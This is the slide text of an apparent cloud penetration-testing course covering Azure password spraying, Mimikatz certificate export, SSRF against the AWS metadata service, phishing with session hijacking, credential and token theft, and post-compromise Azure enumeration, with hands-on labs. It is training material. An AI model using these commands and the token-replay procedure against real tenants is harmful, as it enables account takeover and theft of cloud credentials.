Password Spraying

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Password Spraying
• GOAL: Perform a password spray attack against a list of target
Microsoft Azure users.
• In this lab you will simulate what a password spray attack against
a target Microsoft Azure customer would look like. To do this,
you will be creating a target list of fake account names along
with your own account that you know the credential for. Then,
we will use a PowerShell tool to perform the password spray.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Password Spraying
• We will be using the Windows
VM for the next few labs!
• First, let’s download the MSOL
password spraying script
MSOLSpray from
https://github.com/dafthack/
MSOLSpray.
• Navigate to the repo in a
browser then click
MSOLSpray.ps1 to load the
contents of the script.
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Password Spraying
• Next, click the “Raw” button towards the top right of the script.
• Copy the entire script and paste it into a new text file, then save
it to your system as MSOLSpray.ps1. Make sure to change the
“Save as type” to “All Files”.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Password Spraying
• Create a text file with ten (10) fake users we will spray along with
your own user account
([email protected] ). (Do not spray
accounts you do not own. You may use my domain
“glitchcloud.com” for generating fake target users)
• Save this file as “userlist.txt” in the same location as MSOLSpray.ps1

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Password Spraying
• Start a new PowerShell window.
• Change directories to where you stored MSOLSpray.ps1 and the
userlist file.
• Next import MSOLSpray, and run the spray
PS> Import-Module .\MSOLSpray.ps1
PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password [the password
you set for your test account]

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Password Protection &
Smart Lockout
• Azure Password Protection –
Prevents users from picking
passwords with certain words like
seasons, company name, etc.
• Azure Smart Lockout – Locks out
auth attempts whenever brute
force or spray attempts are
detected.
• Can be bypassed with FireProx +
MSOLSpray
• https://github.com/ustayready/firep
rox
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Web Server Exploitation
• Web server exploitation is a big topic
• Here are some generic things to look for:
• Out-of-date web technologies with known vulns
• SQL or command injection vulns
• Server-Side Request Forgery (SSRF)
• Good place to start post-shell:
• Creds in the Metadata Service
• Certificates
• Environment variables
• Storage accounts

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Web Server Exploitation
• Reused access certs as private keys on web servers
• Compromise web server
• Extract certificate with Mimikatz
• Use it to authenticate to Azure
• Mimikatz can export “non-exportable” certificates
mimikatz# crypto::capi
mimikatz# privilege::debug
mimikatz# crypto::cng
mimikatz# crypto::certificates /systemstore:local_machine
/store:my /export

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
AWS Instance Metadata
URL
• Cloud servers hosted on services like EC2 needed a way to
orient themselves because of how dynamic they are
• A “Metadata” endpoint was created and hosted on a non-
routable IP address at 169.254.169.254
• Can contain access/secret keys to AWS and IAM credentials
• This should only be reachable from the localhost
• Server compromise or SSRF vulnerabilities might allow remote
attackers to reach it

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
AWS Instance Metadata
URL
• IAM credentials can be stored here:
• http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM
Role Name>
• Can potentially hit it externally if a proxy service (like Nginx) is
being hosted in AWS.
• curl --proxy vulndomain.target.com:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/ &&
echo
• CapitalOne Hack
• Attacker exploited SSRF on EC2 server and accessed metadata URL to
get IAM access keys. Then, used keys to dump S3 bucket containing
100 million individual’s data
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
AWS Instance Metadata
URL
• AWS EC2 Instance Metadata service Version 2 (IMDSv2)
• Updated in November 2019 – Both v1 and v2 are available
• Supposed to defend the metadata service against SSRF and
reverse proxy vulns
• Added session auth to requests
• First, a “PUT” request is sent and then responded to with a token
• Then, that token can be used to query data
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-
ec2-metadata-token-ttl-seconds: 21600"`
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-
metadata-token: $TOKEN"
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Phishing
• Phishing is still the #1 method of
compromise
• Target Cloud engineers, Developers,
DevOps, etc.
• Two primary phishing techniques:
• Cred harvesting / session hijacking
• Remote workstation compromise w/ C2

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Phishing: Session Hijack
• Attack designed to steal creds and/or
session cookies
• Can be useful when security
protections prevent getting shells
• Email a link to a target employee
pointing to cloned auth portal
• Examples: Microsoft Online (O365,
Azure, etc.), G-Suite, AWS Console
• They auth and get real session
cookies… we get them too.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Phishing: Session Hijack
• Evilginx2 and Modlishka
• MitM frameworks for harvesting
creds/sessions
• Can also evade 2FA by riding user
sessions
• With a hijacked session we need
to move fast
• Session timeouts can limit access
• Persistence is necessary

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Phishing: G-Suite
• Calendar Event Injection
• Silently injects events to target calendars
• No email required
• Google API allows to mark as accepted
• Bypasses the “don’t auto-add” setting
• Creates urgency w/ reminder notification
• Include link to phishing page

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Phishing: Remote
Access
• Phish to compromise a user’s workstation
• Enables many other options for gaining access to cloud resources
• Steal access tokens from disk
• Session hijack
• Keylog

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Steal Access Tokens
• Google JSON Tokens and
credentials.db
• JSON tokens typically used for
service account access to GCP
• If a user authenticates with gcloud
from an instance their creds get
stored here:
~/.config/gcloud/credentials.db
sudo find /home -name "credentials.db"
• JSON can be used to authenticate
with gcloud and ScoutSuite
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Steal Access Tokens
• Azure Cloud Service Packages (.cspkg)
• Deployment files created by Visual
Studio
• Possible other Azure service
integration (SQL, Storage, etc.)
• Look through cspkg zip files for
creds/certs
• Search Visual Studio Publish directory
<cloud project directory>\bin\debug\publish

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Steal Access Tokens
• Azure Publish Settings files (.publishsettings)
• Designed to make it easier for developers to push code to Azure
• Can contain a Base64 encoded Management Certificate
• Sometimes cleartext credentials
• Open publishsettings file in text editor
• Save “ManagementCertificate” section into a new .pfx file
• There is no password for the pfx
• Search the user’s Downloads directory and VS projects

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Extract Keys From
Storage Explorers
• Developers often use storage explorers to easily upload and
download files to Azure
• It may be possible to extract storage credentials from these
tools
• Storage Explorers store credentials on disk (Windows Credential
Manager) and then use them to authenticate to services such as
Azure
• There are a number of different storage explorers that change
frequently
• Azure Storage Explorer for example has a built-in “Developer
Tools” function that you can use to set breakpoints while loading
the credentials allowing you to view them while unencrypted.
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Steal Access Tokens
• Web Config and App Config files
• Commonly found on pentests to include cleartext creds
• WebApps often need read/write access to cloud storage or DBs
• Web.config and app.config files might contain creds or access tokens
• Look for management cert and extract to pfx like publishsettings files
• Often found in root folder of webapp

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Steal Access Tokens
• Internal Code Repositories
• Gold mine for keys
• Find internal repos:
• A. Portscan internal web services (80, 443, etc.) then use EyeWitness to
screenshot each service to quickly analyze
• B. Query AD for all hostnames, look for subdomains git, code, repo,
bitbucket, gitlab, etc..
• Can use automated tools (gitleaks, trufflehog, gitrob) or use built-
in search features
• Search for AccessKey, AKIA, id_rsa, credentials, secret, password, and token

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Steal Access Tokens
• Check %USERPROFILE&\.azure\ for auth tokens
• During an authenticated session with the Az PowerShell module a
TokenCache.dat file gets generated in the %USERPROFILE%\.azure\
folder.
• Also search disk for other saved context files (.json)
• Multiple tokens can exist in the same context file

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Steal Access Tokens
• Command history
• The commands ran previously may
indicate where to look
• Sometimes creds get passed to the
command line
• Linux hosts command history is here:
• ~/.bash_history
• PowerShell command history is here:
• %USERPROFILE%\AppData\Roaming\Microsoft\Windo
ws\PowerShell\PSReadLine\ConsoleHost_history.txt

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB
Authenticate to Azure With Stolen Access Tokens

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• GOAL: Steal Azure access tokens from a compromised system and
use them to authenticate to Azure.
• In this lab you will simulate stealing access tokens from a target
user who was using the Az PowerShell module. To set this up you
will first authenticate using the Az PowerShell module in the
Windows VM. After copying the tokens to a separate location you
will delete primary token location and close the authenticated
session. You will then manipulate the tokens so they can be used
to authenticate in a new PowerShell session.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• First, let’s generate some tokens that we will “steal” from our victim
• Open a new PowerShell window and import the Az module
PS> Import-Module Az
• Login using your Azure Ad account with the Connect-AzAccount
command
PS> Connect-AzAccount

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• Make a new directory called C:\Temp\
PS> mkdir C:\Temp
• In your PowerShell window
PS> Save-AzContext –Path C:\Temp\AzureAccessToken.json
• We will come back to the saved context file later on

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• Make a new directory at C:\Temp\Live Tokens\
PS> mkdir “C:\Temp\Live Tokens”
• Open Windows Explorer and type %USERPROFILE%\.Azure\
and hit enter
• Copy TokenCache.dat & AzureRmContext.json to
C:\Temp\Live Tokens
• Now close your authenticated PowerShell window!

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• Delete everything in %USERPROFILE%\.azure\
• Start a brand new PowerShell window and run:
PS> Import-Module Az
PS> Get-AzContext -ListAvailable
• You shouldn’t see any available contexts currently

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• In your PowerShell window let’s manipulate the stolen
TokenCache.dat and AzureRmContext.json files so we can import it
into our PowerShell session
PS> $bytes = Get-Content "C:\Temp\Live Tokens\TokenCache.dat" -Encoding
byte
PS> $b64 = [Convert]::ToBase64String($bytes)
PS> Add-Content "C:\Temp\Live Tokens\b64-token.txt" $b64

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• Now let’s add the b64-token.txt to the AzureRmContext.json
file.
• Open the C:\Temp\Live Tokens folder.
• Open AzureRmContext.json file in a notepad and find the line
near the end of the file title “CacheData”. It should be null.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• Delete the word “null” on this line
• Where “null” was add two quotation marks (“”) and then paste
the contents of b64-token.txt in between them.
• Save this file as C:\Temp\Live Tokens\StolenToken.json

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• Let’s import the new token
PS> Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json’
• We are now operating in an authenticated session to Azure
PS> $context = Get-AzContext
PS> $context.Account

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Access Tokens Auth
• You can import the previously exported context
(AzureAccessToken.json) the same way

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Exploiting Misconfigured Cloud Assets
• Gaining a Foothold
• Post-Compromise Recon
• AWS
• Google
• Azure
• LAB: Azure Situational Awareness

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Post-Compromise
Reconnaissance

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Post-Compromise Recon
• Who do we have access as?
• What roles do we have?
• Is MFA enabled?
• What can we access (webapps, storage, etc.?)
• Who are the admins?
• How are we going to escalate to admin?
• Any security protections in place (ATP, GuardDuty, etc.)?

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
AWS
• What do our access keys give us access to?
• WeirdAAL – Great tool for enumerating AWS access by Chris
Gates
• https://github.com/carnal0wnage/weirdAAL
• Run the recon_all module to learn a great deal about your access

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Google
• Cloud Storage, Compute, SQL,
Resource manager, IAM
• ScoutSuite from NCC group
• https://github.com/nccgroup/ScoutS
uite
• Tool for auditing multiple different
cloud security providers
• Create Google JSON token to auth
as service account

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure
• What can we learn with a basic user?
• Subscription Info
• User Info
• Resource Groups
• Scavenging Runbooks for Creds

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure
• Standard users can access Azure domain
information and isn’t usually locked down
• Authenticated users can go to portal.azure.com
and click Azure Active Directory
• O365 Global Address List has this info as well
• Even if portal is locked down PowerShell cmdlets
will still likely work
• There is a company-wide setting that locks down
the entire org from viewing Azure info via cmd line:
• Set-MsolCompanySettings –
UsersPermissionToReadOtherUsersEnabled $false
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: CLI Access
• Azure Service Management (ASM or Azure “Classic”)
• Legacy and recommended to not use
• Azure Resource Manager (ARM)
• Added service principals, resource groups, and more
• Management Certs not supported
• PowerShell Modules
• Az, AzureAD & MSOnline
• Azure Cross-platform CLI Tools
• Linux and Windows client

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Subscriptions

• Organizations can have multiple subscriptions

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Subscriptions
• A good first step is to determine
what subscription you are in
• The subscription name is usually
informative
• It might have “Prod”, or “Dev” in
the title
• Multiple subscriptions can be
under the same Azure AD
directory (tenant)
• Each subscription can have
multiple resource groups
© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: User Information
• Built-In Azure Subscription Roles
• Owner (full control over resource)
• Contributor (All rights except the ability to change permissions)
• Reader (can only read attributes)
• User Access Administrator (manage user access to Azure resources)

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: User Information
• Get the current user’s role assignement
PS> Get-AzRoleAssignment
• If the Azure portal is locked down it is still possible to access
Azure AD user information via MSOnline cmdlets
• The below examples enumerate users and groups
PS> Get-MSolUser -All
PS> Get-MSolGroup –All
PS> Get-MSolGroupMember –GroupObjectId <GUID>
• Pipe Get-MSolUser –All to format list to get all user attributes
PS> Get-MSolUser –All | fl

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Resource Groups
• Resource Groups collect various services for easier management
• Recon can help identify the relationships between services such
as WebApps and SQL
PS> Get-AzResource
PS> Get-AzResourceGroup

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Runbooks
• Azure Runbooks automate various tasks in Azure
• Require an Automation Account and can contain sensitive
information like passwords
PS> Get-AzAutomationAccount
PS> Get-AzAutomationRunbook -AutomationAccountName
<AutomationAccountName> -ResourceGroupName <ResourceGroupName>
• Export a runbook with:
PS> Export-AzAutomationRunbook -AutomationAccountName <account name>
-ResourceGroupName <resource group name> -Name <runbook name> -
OutputFolder .\Desktop\

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB
Azure Situational Awareness

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Azure Situational
Awareness
• GOAL: Use the MSOnline and Az PowerShell modules to do
basic enumeration of an Azure account post-compromise.
• In this lab you will authenticate to Azure using your Azure AD
account you setup. Then, you will import the MSOnline and Az
PowerShell modules and try out some of the various modules
that assist in enumerating Azure resource usage.

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Azure Situational
Awareness
• Start a new PowerShell window and import both the MSOnline
and Az modules
PS> Import-Module MSOnline
PS> Import-Module Az
Authenticate to each service with your Azure AD account:
PS> Connect-AzAccount
PS> Connect-MsolService

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Azure Situational
Awareness
• First get some basic Azure
information Get-
MSolCompanyInformation
• Some interesting items here are
• UsersPermissionToReadOtherUsersEnabled
• DirSyncServiceAccount
• PasswordSynchronizationEnabled
• Address/phone/emails
PS> Get-MSolCompanyInformation

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Azure Situational
Awareness
• Next, we will start looking at the subscriptions associated with
the account as well as look at the current context we are
operating in. Look at the “Name” of the subscription and
context for possible indication as to what it is associated with.
PS> Get-AzSubscription
PS> $context = Get-AzContext
PS> $context.Name
PS> $context.Account

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Azure Situational
Awareness
• Enumerating the roles assigned to your user will help identify
what permissions you might have on the subscription as well as
who to target for escalation.
PS> Get-AzRoleAssignment

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Azure Situational
Awareness
• List out the users on the subscription. This is the equivalent of
“net users /domain” in on-prem AD
PS> Get-MSolUser -All
• The user you setup likely doesn’t have any resources currently
associated with it, but these commands will help to understand
the specific resources a user you gain access to has.
PS> Get-AzResource
PS> Get-AzResourceGroup

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
LAB: Azure Situational
Awareness
• There are many other functions.
• Use Get-Module to list out the
other Az module groups
• To list out functions available within
each module use the below
command substituting the value of
the “Name” parameter.
PS> Get-Module -Name Az.Accounts |
Select-Object -ExpandProperty
ExportedCommands
PS> Get-Module -Name MSOnline | Select-
Object -ExpandProperty ExportedCommands

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Tools
• ROADtools by Dirk-jan Mollema
• https://github.com/dirkjanm/ROADtools
• Dumps all Azure AD info from the
Microsoft Graph API
• Has a GUI for interacting with the
data
• Plugin for BloodHound with
connections to on-prem AD
accounts if DirSync is enabled

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Azure: Tools
• More tools to automate post-compromise
• PowerZure
• https://github.com/hausec/PowerZure
• MicroBurst
• https://github.com/NetSPI/MicroBurst
• ScoutSuite
• https://github.com/nccgroup/ScoutSuite

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Review

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Review

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
Review
• Authentication Methods
• Reconnaissance
• Exploiting Misconfigurations
• Gaining Access
• Post-Compromise Recon

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
What's Next?
• More Offensive Tradecraft Cloud Penetration Testing Training:
• Pillaging Cloud Assets
• Persistence, Privilege Escalation, Data Harvesting
• Cloud Infrastructure Attacks
• Services, VMs, Network Pivots, Domain Attacks, DevOps, Scanning Tools
• Weaponizing the Cloud for Red Team Operations
• Domain Fronting, Redirectors, Azure DevOps, Cloud Phishing Infrastructure

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
The End
• Follow me on Twitter
• Beau Bullock - @dafthack
• Black Hills Information Security
• https://www.blackhillsinfosec.com
• @BHInfoSecurity

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
References
• https://www.microsoft.com/en-us/msrc/pentest-rules-of-engagement
• https://aws.amazon.com/security/penetration-testing/
• https://support.google.com/cloud/answer/6262505?hl=en
• https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs
• https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
• https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed
• https://docs.microsoft.com/en-us/azure/api-management/api-management-howto-mutual-certificates
• https://aws.amazon.com/blogs/security/guidelines-for-protecting-your-aws-account-while-using-programmatic-access/
• https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction
• https://www.trustedsec.com/blog/owning-o365-through-better-brute-forcing/
• https://blog.netspi.com/anonymously-enumerating-azure-file-resources/
• https://github.com/NetSPI/MicroBurst
• https://www.shellntel.com/blog/2019/8/27/aws-metadata-endpoint-how-to-not-get-pwned-like-capital-one
• https://rhinosecuritylabs.com/cloud-security/aws-security-vulnerabilities-perspective/
• https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com
References (Continued)
• https://www.cloudhealthtech.com/blog/aws-vs-azure-vs-google
• https://github.com/bishopfox/dufflebag
• https://github.com/dafthack/PowerMeta
• https://github.com/zricethezav/gitleaks
• https://blog.appsecco.com/an-ssrf-privileged-aws-keys-and-the-capital-one-breach-4c3c2cded3af
• https://www.we45.com/blog/how-an-unclaimed-aws-s3-bucket-escalates-to-subdomain-takeover
• https://lares.com/hunting-azure-admins-for-vertical-escalation
• https://nostarch.com/azure
• https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles
• https://github.com/dirkjanm/ROADtools

© Offensive Tradecraft by BHIS


@BHInfoSecurity
https://www.blackhillsinfosec.com

You might also like